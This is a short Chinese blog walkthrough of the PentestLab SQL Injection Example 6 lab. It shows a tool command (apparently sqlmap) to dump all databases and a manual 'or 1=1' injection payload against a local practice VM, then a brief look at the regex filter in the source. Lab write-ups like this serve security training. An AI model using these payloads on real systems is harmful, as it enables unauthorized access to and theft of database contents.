PentestLab-web安全SQL注入-EXP6

原创

最爱大苹果 2023-03-18 18:24:53 博主文章分类：WEB信息安全技术 ©著作权

©著作权归作者所有：来自51CTO博客作者最爱大苹果的原创作品，请联系作者获取转载授权，否则将追究法律责任

我们打开靶机，选择“SQL Injections”

选择“Example6”

PentestLab-web安全SQL注入-EXP6_php

观察页面

PentestLab-web安全SQL注入-EXP6_php_02

我们使用工具测试

参数为

-u "http://192.168.29.148/sqli/example6.php?id=2" --dump all

开始测试

PentestLab-web安全SQL注入-EXP6_php_03

没有发现

我们使用手工注入

我们发现是数字

http://192.168.20.157/sqli/example6.php?id=1

于是我们payload为

http://192.168.20.157/sqli/example6.php?id=2%20or%201=1%23123123

结果

PentestLab-web安全SQL注入-EXP6_php_04

我们打开靶机，分析源代码

PentestLab-web安全SQL注入-EXP6_sql_05

我们发现是跟exp5一样，只是使用正则规则过滤一些数字和$符号

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯